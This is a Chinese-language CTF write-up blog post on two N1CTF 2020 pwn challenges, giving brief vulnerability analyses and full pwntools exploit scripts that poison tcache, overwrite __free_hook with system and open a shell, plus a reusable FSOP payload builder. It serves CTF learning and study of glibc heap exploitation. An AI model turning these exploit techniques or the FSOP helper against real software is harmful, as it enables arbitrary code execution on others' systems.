2020N1CTF

2020-11-04

字数统计: 909字 | 阅读时长≈ 4分

感觉应该是有好几道Pwn题的，但是只找到两道。

EasyWrite

程序分析

程序一开始给了Libc地址，存在一个任意地址修改漏洞。将第一次堆块的值赋给我们想要修改的地址，输入第二次堆块的内容，并释放它。

利用分析

对 tcache_perthread_struct 结构体指针的攻击，但是不知道怎么确定他的地址，查了一些题解，也没有说明这个地址是怎么确定的。这个值在源码里是一个全局变量，调试时发现这个值应该是存储在 fs寄存器里：如下所示。感觉这确实是一个自己不知道的知识点。

TIPS：

对之前写得 FSOP的payload生成函数，加强了一下：

def pack_file(_flags = 0,
              _IO_read_ptr = 0,
              _IO_read_end = 0,
              _IO_read_base = 0,
              _IO_write_base = 0,
              _IO_write_ptr = 0,
              _IO_write_end = 0,
              _IO_buf_base = 0,
              _IO_buf_end = 0,
              _IO_save_base = 0,
              _IO_backup_base = 0,
              _IO_save_end = 0,
              _IO_marker = 0,
              _IO_chain = 0,
              _fileno = 0,
              _lock = 0,
              _wide_data = 0,
              _mode = 0):
    file_struct = p32(_flags) + \
            p32(0) + \
            p64(_IO_read_ptr) + \
            p64(_IO_read_end) + \
            p64(_IO_read_base) + \
            p64(_IO_write_base) + \
            p64(_IO_write_ptr) + \
            p64(_IO_write_end) + \
            p64(_IO_buf_base) + \
            p64(_IO_buf_end) + \
            p64(_IO_save_base) + \
            p64(_IO_backup_base) + \
            p64(_IO_save_end) + \
            p64(_IO_marker) + \
            p64(_IO_chain) + \
            p32(_fileno)
    file_struct = file_struct.ljust(0x88, "\x00")
    file_struct += p64(_lock)
    file_struct = file_struct.ljust(0xa0, "\x00")
    file_struct += p64(_wide_data)
    file_struct = file_struct.ljust(0xc0, '\x00')
    file_struct += p64(_mode)
    file_struct = file_struct.ljust(0xd8, "\x00")
    return file_struct

def payload_IO_file_finish(libc,_IO_str_jumps_addr, system_addr, binsh_addr):
    payload = pack_file(_flags = 0,
                    _IO_read_ptr = 0x61,
                    _IO_read_base = libc.sym['_IO_list_all']-0x10,
                    _IO_write_base = 0,
                    _IO_write_ptr = 1,
                    _IO_buf_base = binsh_addr,
                    _mode = 0x7fffffff,
                    _wide_data = 0x1eb880+libc,
                    )
    payload += p64(_IO_str_jumps_addr-8)
    payload += p64(0)
    payload += p64(system_addr)
    return payload

EXP

from pwn import *
context.update(arch='amd64', os='linux', log_level='debug')
context.terminal=(['tmux', 'splitw', '-h'])

debug = 1
if debug == 1:
    p = process('./easywrite')
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    elf = ELF('./easywrite')

def pwn():
    p.recvuntil('Here is your gift:')
    libc_base = int(p.recvuntil('\n', drop=True), 16) - libc.sym['setbuf']
    print 'libc_base:',hex(libc_base)
    libc.address = libc_base

    system_addr = libc.sym['system']
    free_hook = libc.sym['__free_hook']
    print 'system_addr:',hex(system_addr)
    print 'free_hook:',hex(free_hook)

    p.recvuntil('Input your message:')
    payload = p32(0) + p32(1) + p64(0)*int((0x410-0x10)/0x40-1) + p64(0)*2 + p64(free_hook-0x10)
    p.sendline(payload)
    gdb.attach(p, 'bp $rebase(0x12f9)')
    p.recvuntil('Where to write?:')
    p.sendline(p64(libc_base+0x1f34f0))

    p.recvuntil('Any last message?:')
    payload = '/bin/sh\x00'
    payload = payload.ljust(16, '\x00')
    payload += p64(system_addr)
    p.send(payload)

    p.interactive()

pwn()

程序分析

New函数能够申请两种堆块。两种堆块各有一个结构体，形式如下：

1	begin_ptr, cur_ptr, end_ptr

cur_ptr控制当前写入的地址，当 cur_ptr和 end_ptr想等后，再写入时就会先申请一个大一点的堆块，再释放当前堆块。

Delete函数，会将当前 cur_ptr的值减去8，并且并没有对 cur_ptr做检测，导致可以一致相减，使 cur_ptr上溢，达到任意地址写的目的。

利用分析

首先要不断申请，实现申请一个大于 0x420的堆块，再将其释放到unsortebdin来泄露libc地址
随后利用 delete，将cur_addr不断上溢到第一个0x20的tcahce的next指针处，修改该指针指向 free_hook的地址；
随后分配第2种堆块，此时会再次分配第一个 0x20的tcache，在其中布置 /bin/sh。然后再次分配第2种堆块，会先申请 free_hook所在伪造tcache，然后修改 free_hook为system，再释放之前的堆块即 0x20的tcache。达到 getshell的目的。

EXP

from pwn import *
context.update(arch='amd64', os='linux', log_level='debug')
context.terminal=(['tmux', 'splitw', '-h'])

debug = 1
if debug == 1:
    p = process('./SignIn')
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    elf = ELF('./SignIn')

def New(idx, num):
    p.sendlineafter('>>', '1')
    p.sendlineafter('Index:', str(idx))
    p.sendlineafter('Number:', str(num))

def Delete(idx):
    p.sendlineafter('>>', '2')
    p.sendlineafter('Index:', str(idx))

def Show(idx):
    p.sendlineafter('>>', '3')
    p.sendlineafter('Index:', str(idx))

def Pwn():
    for i in range(0x101):
        New(1, "1")

    for i in range(0x1a0 + 0x80 - 30):
        Delete(1)
    Show(1)

    libc.address = int(p.recvuntil('\n', drop=True)) - 96 -0x10 - libc.sym['__malloc_hook']
    print 'libc_addr:',hex(libc.address)
    free_hook = libc.sym['__free_hook']
    print 'free_hook:',hex(free_hook)
    system_addr = libc.sym['system']

    for i in range(int(0x860 / 8)+1):#range(0x24d5):
        Delete(1)
    print 'libc_addr:', hex(libc.address)
    gdb.attach(p, 'bp $rebase(0x11f7)')

    # Delete(1)
    New(1, free_hook-0x8)
    New(2, u64('/bin/sh\x00'))
    New(2, system_addr)

    p.interactive()
Pwn()

本文作者： A1ex
本文链接： http://yoursite.com/2020/11/04/N1CTF/
版权声明： 本博客所有文章除特别声明外，均采用 MIT 许可协议。转载请注明出处！